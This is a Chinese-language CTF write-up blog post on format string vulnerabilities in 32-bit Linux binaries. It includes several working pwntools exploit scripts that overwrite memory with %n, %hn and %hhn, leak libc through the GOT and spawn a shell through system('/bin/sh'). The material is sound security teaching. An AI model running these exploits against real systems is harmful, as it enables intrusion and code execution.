<!DOCTYPE html><html lang="zh-CN"><head><title>格式化字符串漏洞</title><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=0.5"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><link rel="stylesheet" href="/css/highlight/xcode.min.css"><link rel="stylesheet" href="/css/bootstrap/bootstrap-tooltips.css"><link rel="stylesheet" href="/css/post.css"><script src="/js/jquery.min.js"></script><meta name="generator" content="Hexo 5.4.2"></head><body><script>if (/mobile/i.test(navigator.userAgent) || /android/i.test(navigator.userAgent)) {
  document.body.classList.add('mobile')
}</script><div><div class="inner"><h1>格式化字符串漏洞</h1><div class="time">2022-10-30</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00%EF%BC%9A%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-text">0x00：基础知识</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01%EF%BC%9AFormat-String%E4%BD%8D%E4%BA%8E%E6%A0%88%E4%B8%8A"><span class="toc-text">0x01：Format String位于栈上</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02%EF%BC%9A%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90"><span class="toc-text">0x02：深入分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03%EF%BC%9AFormat-String%E4%B8%8D%E5%9C%A8%E6%A0%88%E4%B8%8A"><span class="toc-text">0x03：Format String不在栈上</span></a></li></ol><h2 id="0x00：基础知识"><a href="#0x00：基础知识" class="headerlink" title="0x00：基础知识"></a>0x00：基础知识</h2><p>直接看wiki：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/">https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/</a></p>
<p>重点说一下：”%n”写数据时，是写到参数指向的位置，而不是写到参数那个位置。</p>
<br>

<h2 id="0x01：Format-String位于栈上"><a href="#0x01：Format-String位于栈上" class="headerlink" title="0x01：Format String位于栈上"></a>0x01：Format String位于栈上</h2><p>题目来源：攻防世界的<a target="_blank" rel="noopener" href="https://adworld.xctf.org.cn/challenges/details?hash=c17a14e0-9bc1-4370-ab33-7348e06f55f2_2&task_category_id=2">实时数据检测</a></p>
<div style="font-size: 21px;"><b>步骤1：查看文件信息</b></div>

<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/2641001-20220616133204703-995680243.png" alt="img"></p>
<p>一个32位的文件，canary、NX、PIE保护机制均关闭。</p>
<br>

<div style="font-size: 21px;"><b>步骤2：静态分析</b></div>

<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/2641001-20220616133204703-995680243.png" alt="2641001-20220616133204703-995680243"></p>
<p>程序很简单，输入一串字符（个数限制为512），然后再输出。最后根据key变量进行条件语句执行。</p>
<p>在imagemagic函数中用<code>printf(format)</code>进行输出，存在格式化字符串漏洞。因为key的地址在bss段：0x0804A048，所以利用格式化字符串漏洞进行覆盖。</p>
<br>

<p>检测一下偏移：</p>
<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/2641001-20220616133254756-1850709916.png" alt="img"></p>
<p>这里前面的AAAA是printf的参数，后面AAAA用%p打印出来的为locker函数里面的局部变量s。</p>
<p>payload = p32(key_addr) + b’%035795742d’ + b’%12$n’</p>
<ul>
<li>将key的地址写在第一位，相当于也会写在第12参数上。</li>
<li>%12$n : 是指对第12的参数写入前面成功输出的字节数。</li>
<li>%035795742d：前面key_addr已经占了4个字节，还要在输出35795746 - 4个字节。</li>
</ul>
<br>

<div style="font-size: 21px;"><b>步骤3：编写exp</b></div>

<pre><code class="python">from pwn import *
context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;)

io = process(&quot;./datajk&quot;)
#io = remote(&quot;111.200.241.244&quot;,65079)

key_addr = 0x0804A048
payload = p32(key_addr) + b&#39;%35795742d&#39; + b&#39;%12$n&#39;

io.sendline(payload)
io.interactive()
</code></pre>
<p>远程的话大概要几分钟输出，本地的话快一点。直接对四个字节一次性写入的exp很简单，但很粗鲁，随后讲讲怎么用h和hh标志进行改进。</p>
<br>

<div style="font-size: 21px;"><b>改进：使用h标志</b></div>

<p>上面因为%n是写入4字节数据，所以就直接写整个数，导致要输出大量数据才可以满足。但带格式化字符串中有那么两个标识：</p>
<ul>
<li>h ：以双字节的形式；</li>
<li>hh：以单字节的形式；</li>
</ul>
<p>要使key=35795746（0x0222 3322），因为程序为小端序，高字节存储在低地址。所以就是要使key_addr处为0x3322，key_addr+2处为0x0222。</p>
<pre><code class="python">from pwn import *
context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;)

#io = process(&quot;./datajk&quot;)
io = gdb.debug(&quot;./datajk&quot;)
key_addr = 0x0804A048

#35795746 == 0x02223322
#num1 = 0x222 0x222 == 546
#num2 = 0x3322 0x3322 == 13090; 12544=13090-546

payload = p32(key_addr) + p32(key_addr + 2)
payload += b&#39;%0538d&#39; + b&#39;%13$hn&#39;
payload += b&#39;%012544d&#39; + b&#39;%12$hn&#39;

io.sendline(payload)
io.interactive()
</code></pre>
<p>注：用%n写入数据的顺序要从写入数值小的开始。</p>
<p>前面已经输出了两个地址，占了8字节，所以0x222要减去8为538。后面的12544同理，要减去已输出的量。</p>
 <br>

<div style="font-size: 21px;"><b>改进：使用hh标志</b></div>

<p>将0x02223322拆分成\x02 \x22 \x33 \x22，\x02写到最高地址，最右边的\x22写到最低地址。</p>
<p>这时要灵活的改变‘覆盖地址’的参数位了，可以先看一下wiki中的这个页面的‘覆盖小数字’：</p>
<p><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-exploit/#_14">https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-exploit/#_14</a></p>
<p>exp里面的a主要用于调参数位（按4调整）。由于这里调动比较灵活，而且代码不唯一。但大概思想不变，所以就不做多解释了。</p>
<pre><code class="python">from pwn import *
context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;)

io = process(&quot;./datajk&quot;)
key_addr = 0x0804A048

#0x02 22 33 22 (high -&gt; low)
#input 0x02
payload = b&#39;aa%15$hhnaaa&#39; + p32(key_addr + 3)
#input 0x22(two)
payload += p32(key_addr + 2) + p32(key_addr) + b&#39;%017d%16$hhn&#39; + b&#39;%17$hhna&#39;
#input 0x33
payload += p32(key_addr + 1) + b&#39;%012d%23$hhn&#39;

io.sendline(payload)
io.interactive()
</code></pre>
<br>

<h2 id="0x02：深入分析"><a href="#0x02：深入分析" class="headerlink" title="0x02：深入分析"></a>0x02：深入分析</h2><p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/image-20221024192118747.png" alt="image-20221024192118747"></p>
<p>通过格式化字符串漏洞往目标地址写入数据的关键点是“目标地址”的地址存在格式化字符串的上方。所以利用成否的关键是能否部署“目标地址”的地址在栈上！</p>
<p>当存储格式化字符串的变量是位于栈上时，直接往格式化字符串中写入地址即可部署。但%n写数据时，是突破了栈帧的界限，将上面的（或同一个）栈帧的局部变量作为参数。</p>
<p>但存储格式化字符串的变量也有可能位于.bss段或者堆空间上，这时我们可以找个中介。</p>
<img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/image-20221024194244585.png" alt="image-20221024194244585" style="zoom: 67%;" />

<p>我们通过指向中介的指针往中介(fakespace)那写入目标地址，这样目标地址就部署好了。后续就可以往目标地址写数据了。</p>
<br>

<h2 id="0x03：Format-String不在栈上"><a href="#0x03：Format-String不在栈上" class="headerlink" title="0x03：Format String不在栈上"></a>0x03：Format String不在栈上</h2><p>程序：login</p>
<p>链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1KphajK-T7atgV4vc0iKLRA">https://pan.baidu.com/s/1KphajK-T7atgV4vc0iKLRA</a><br>提取码：lele</p>
<div style="font-size: 21px;"><b>步骤1：查看文件信息</b></div>

<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/image-20221024182059434.png" alt="image-20221024182059434"></p>
<br>

<div style="font-size: 21px;"><b>步骤2：静态分析</b></div>

<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/image-20221024182233665.png" alt="image-20221024182233665"></p>
<p>输入name后，这个函数进行密码验证。当密码为“wllmmllw”时，验证成功，退出循环。否则一直循环，循环里面存有格式化字符串漏洞。值得注意的是，变量passwd是位于.bss段的。</p>
<br>

<div style="font-size: 21px;"><b>步骤3：动态调试分析</b></div>

<p>格式化字符串位于.bss段，仅靠静态调试无法获取更多的信息。因此需要动调，断在printf(passwd)附近，查看栈空间。</p>
<p>断在0x080485AF，查看栈空间：</p>
<p><img src="/images/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/image-20221024183310910.png" alt="image-20221024183310910"></p>
<p>计划使用ROP控制执行流去执行<code>system(&quot;/bin.sh&quot;)</code>，那么我们需要泄露libc版本。用于存在格式化字符串漏洞，所以我们只要将puts@got的地址写在format string的上方附近，使用%s打印即可。栈地址可通过%p轻易泄露，那怎么将puts@写到栈上了？</p>
<pre><code>0xffffd1b4 —▸ 0xffffd264 —▸ 0xffffd403 ◂— &#39;/home/tolele/studyspace/week36/login&#39;
0xffffd1b8 —▸ 0xffffd26c —▸ 0xffffd428 ◂— &#39;SHELL=/bin/bash&#39;
</code></pre>
<p>我们可以选一个中介位置(fakespace)，通过栈上的这两个数据。往0xffffd264写入fakespace，0xffffd26c写入fakespace+2。栈上有了这两个地址后，就可以往fakespace处写数据了。</p>
<br>

<div style="font-size: 21px;"><b>步骤4：编写exp</b></div>

<pre><code class="python">from pwn import *
context(os=&#39;linux&#39;, arch=&#39;i386&#39;, log_level=&#39;debug&#39;)

io = process(&quot;./login&quot;)
elf = ELF(&quot;./login&quot;)

def debug():
    gdb.attach(io)
    pause()

io.sendlineafter(&quot;Please input your name: &quot;, &quot;tolele&quot;)
io.sendlineafter(&quot;Please input your password: &quot;, &quot;%6$p&quot;)
io.recvline()
ebp_addr = int(io.recvline()[-11:-1],16) - 0x10
print(&quot;@@@ ebp_addr = &quot; + str(hex(ebp_addr)))

# leak libc version
def fmt_func(addr, data):
    data_high = (data&amp;0xffff)
    data_low = (data&amp;0xffff0000)&gt;&gt;16
    high_addr = (addr&amp;0xffff) + 2
    low_addr = high_addr - 2
    #io.sendlineafter(&quot;Please input your password: &quot;, &#39;%&#39;+str(low_addr)+&#39;c&#39;+&#39;%21$hn&#39;)
    payload1 = &#39;%&#39;+str(low_addr)+&#39;d&#39;+&#39;%21$hn&#39;
    io.sendline(payload1)
    io.recvuntil(&quot;Try again!&quot;)
    #io.sendlineafter(&quot;Please input your password: &quot;, &#39;%&#39;+str(high_addr)+&#39;c&#39;+&#39;%22$hn&#39;)
    payload2 = &#39;%&#39;+str(high_addr)+&#39;d&#39;+&#39;%22$hn&#39;
    io.sendline(payload2)
    io.recvuntil(&quot;Try again!&quot;)
    #io.sendlineafter(&quot;Please input your password: &quot;, &quot;%&quot;+str(data_high)+&quot;c&quot;+&quot;%65$hn&quot;)
    payload3 = &quot;%&quot;+str(data_high)+&quot;d&quot;+&quot;%65$hn&quot;
    io.sendline(payload3)
    io.recvuntil(&quot;Try again!&quot;)
    #io.sendlineafter(&quot;Please input your password: &quot;, &quot;%&quot;+str(data_low)+&quot;c&quot;+&quot;%67$hn&quot;)
    payload4 = &quot;%&quot;+str(data_low)+&quot;d&quot;+&quot;%67$hn&quot;
    io.sendline(payload4)
    io.recvuntil(&quot;Try again!&quot;)

puts_got = elf.got[&#39;puts&#39;]
fakeaddr = ebp_addr + 0x10
fmt_func(fakeaddr, elf.got[&#39;puts&#39;])
io.sendline(&quot;%10$s&quot;)
puts_addr = u32(io.recvuntil(b&#39;\xf7&#39;)[-4:].ljust(4,b&#39;\x00&#39;))
print(&quot;@@@ puts_addr = &quot;+str(hex(puts_addr)))

libc = ELF(&quot;./libc.so.6&quot;)
sys_libc = libc.sym[&#39;system&#39;]
puts_libc = libc.sym[&#39;puts&#39;]
binsh_libc = libc.search(b&#39;/bin/sh&#39;).__next__()

sys_addr = puts_addr - puts_libc + sys_libc
binsh_addr = puts_addr - puts_libc + binsh_libc
fmt_func(ebp_addr + 0x4, sys_addr)
fmt_func(ebp_addr + 0xc, binsh_addr)
# debug()
io.sendline(&quot;wllmmllw&quot;)
io.interactive()
</code></pre>
<p>fmt_func里面使用的sendlineafter写入时，发生了一些报错，改成随后的两个语句后就可以了，暂时找不到原因，先留着注释。</p>
<p>题目时没有libc的，但是泄露本机的libc后，查询不到相应的版本，可能是因为版本比较新的原因，所以我就直接找本机的libc文件进行代替了。</p>
<p class="textAlignRight"><span>↶ </span><a href="/">返回首页</a><span></span></p></div></div></body><script src="/js/highlight.min.js"></script><script src="/js/main.js"></script><script src="/js/bootstrap/bootstrap.min.js"></script><script>window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', '');</script></html>